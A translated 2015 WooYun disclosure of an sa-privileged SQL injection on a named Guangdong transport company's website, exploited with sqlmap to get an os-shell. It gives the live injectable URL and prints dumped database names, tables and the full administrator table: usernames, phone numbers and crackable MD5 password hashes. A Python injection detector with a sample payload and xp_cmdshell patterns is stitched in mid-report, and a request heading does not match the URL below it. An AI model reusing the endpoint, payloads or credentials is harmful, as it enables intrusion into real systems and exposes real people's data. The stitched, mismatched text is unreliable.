
Vulnerability summary

Defect ID: wooyun-2015-099663

Title: Guangdong Yueyun Transportation Company found with an sa-privileged SQL injection; os-shell executed via sqlmap

Related vendor: Guangdong Information Security Evaluation Center (广东省信息安全测评中心)

Author: 千斤拨四两

Submitted: 2015-03-06 11:57

Fixed: 2015-04-20 14:22

Published: 2015-04-20 14:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed to a third-party partner organization (Guangdong Information Security Evaluation Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-06: details sent to the vendor, awaiting vendor handling
2015-03-10: vendor confirmed; details disclosed to the vendor only
2015-03-20: details disclosed to core white hats and domain experts
2015-03-30: details disclosed to regular white hats
2015-04-09: details disclosed to intern white hats
2015-04-20: details disclosed to the public

Brief description:

SQL injection running with sa privileges; os-shell executed via sqlmap

Details:

URL: http://www.gdyueyun.com/Stage/AnnualReport.aspx
Request data (injectable POST body):


http://www.gdyueyun.com/Stage/SearchPage.aspx?keywords=1*&languagetype=sc
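As an added example that is not part of the original report, the following Python check is what a defender could run over web-server logs or a WAF feed to spot the kind of request shown above: it decodes an ASP.NET form post and flags any field whose value carries a boolean-based blind injection signature such as the one sqlmap sends (a closing quote, OR/AND, and a numeric comparison that re-opens the quote). The sample body is constructed; the ASP.NET state fields are skipped because their base64 blobs are never user-typed and only cause false positives.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qsl

# ASP.NET state fields: opaque base64 blobs the browser echoes back, not
# user input, so they are excluded from pattern matching.
ASPNET_STATE_FIELDS = {"__VIEWSTATE", "__EVENTVALIDATION", "__EVENTTARGET", "__EVENTARGUMENT"}

# Signatures of boolean-based blind injection as sqlmap emits it, plus a few
# MSSQL-specific keywords worth alerting on in any user-supplied field.
SQLI_PATTERNS = [
    # e.g.  -1' or 81 = '79   (quote, OR/AND, number = quote-number)
    re.compile(r"'\s*(or|and)\s*\d+\s*=\s*'\d+", re.I),
    # e.g.  1' and 'a'='a      (quote, OR/AND, quoted string = quote)
    re.compile(r"'\s*(or|and)\s*'[^']*'\s*=\s*'", re.I),
    re.compile(r"\b(union\s+select|xp_cmdshell|waitfor\s+delay)\b", re.I),
]

# Constructed sample: a form post to AnnualReport.aspx whose month selector
# carries a boolean-based payload; VIEWSTATE is truncated on purpose.
SAMPLE_BODY = (
    "head%24txtSearch=&hiddMonth=-1%27%20or%2081%20%3d%20%2779&hiddYear="
    "&month=0&__EVENTTARGET=AspNetPager1&__VIEWSTATE=%2FwEPDwUJMTc4"
)


def find_sqli_params(body: str) -> list[tuple[str, str]]:
    """Return (field, decoded value) pairs whose value matches an injection signature."""
    hits = []
    # parse_qsl percent-decodes both names and values (%27 -> ', %3d -> =)
    for field, value in parse_qsl(body, keep_blank_values=True):
        if field in ASPNET_STATE_FIELDS:
            continue
        if any(p.search(value) for p in SQLI_PATTERNS):
            hits.append((field, value))
    return hits


if __name__ == "__main__":
    for field, value in find_sqli_params(SAMPLE_BODY):
        print(f"suspicious field {field!r}: {value!r}")
```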


A large set of databases:

available databases [17]:
[*] CopyOfRisk
[*] CopyOfRisk_0
[*] IGKICPOS
[*] master
[*] model
[*] msdb
[*] pams
[*] pams0720
[*] pams2
[*] PAMS_AddonsInfo
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] Test
[*] testny
[*] Web_YueYunTraffic
[*] Web_YueYunTraffic_Test
Database: Web_YueYunTraffic
[26 tables]
+-----------------------+
| AboutSafety |
| AdminMenu |
| AdminPageFunction |
| Administrator |
| AnnualReport |
| CompanyGovernment |
| ContactUs |
| CultureGlimpse |
| Custom |
| EnterpriseBulletin |
| EnterprisePublication |
| FinancialHighlights |
| IndependentBuild |
| IndustryNews |
| LZBuild |
| MembersNews |
| Multilingual |
| News |
| PFGarden |
| PageFunction |
| PartyBuild |
| PoliciesRegulation |
| PromotionalMaterial |
| SocietySound |
| Sys_Menu |
| YouthActivity |
+-----------------------+
Database: Web_YueYunTraffic
Table: Administrator
[12 columns]
+---------------+
| Column |
+---------------+
| AddTime |
| AdminAdress |
| AdminAge |
| AdminEmail |
| AdminID |
| AdminName |
| AdminPhoneNum |
| AdminPwd |
| AdminSex |
| AdminStatus |
| AdminTrueName |
| Type |
+---------------+
Database: Web_YueYunTraffic
Table: Administrator
[4 entries]
+---------+------+----------------------------+----------+----------------------------------+----------+-----------+------------------+-------------+-------------+---------------+---------------+
| AdminID | Type | AddTime | AdminAge | AdminPwd | AdminSex | AdminName | AdminEmail | AdminStatus | AdminAdress | AdminPhoneNum | AdminTrueName |
+---------+------+----------------------------+----------+----------------------------------+----------+-----------+------------------+-------------+-------------+---------------+---------------+
| 1 | NULL | 10 17 2013 12:00AM | 22 | 2AE68513F220DD72CE11F392A1EBB627 | 0 | admin | [email protected] | 0 | NULL | 15802704163 | 管理员 |
| 11 | NULL | 01 \\?a08 2014 \\?a02:40PM | 23 | F583737E562A35F3F49AFD2A60669F79 | 1 | zhengquan | [email protected] | 0 | NULL | 13562234523 | 证券 |
| 12 | NULL | 01 \\?a08 2014 \\?a02:40PM | NULL | E10ADC3949BA59ABBE56E057F20F883E | 1 | zhangyang | NULL | 0 | NULL | 15802704163 | 张阳 |
| 14 | NULL | 04 \\?a08 2014 \\?a09:28AM | 26 | E10ADC3949BA59ABBE56E057F20F883E | 1 | wulan | [email protected] | 0 | NULL | 13579023214 | 吴兰 |
+---------+------+----------------------------+----------+----------------------------------+----------+-----------+------------------+-------------+-------------+---------------+---------------+


Below are the MSSQL login names and password hashes:


Proof of vulnerability:

Some screenshots as proof:

(screenshot: sasa.png)


Shows that the current user has sa privileges: True
MSSQL has 5 users:

(screenshot: user.png)


(screenshot: da.png)


sqlmap executing os-shell:

(screenshot: os.jpg)

Fix recommendation:

Fix it, and fix it fast!!!

Copyright notice: when reposting, credit the source: 千斤拨四两@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-03-10 09:56

Vendor reply:

Thank you very much for your report.
The issue in the report has been confirmed and reproduced.
Affected data: high
Attack cost: low
Impact: high
Overall rating: high, rank: 11
We are contacting the relevant website administration unit to handle it.

Latest status:

None yet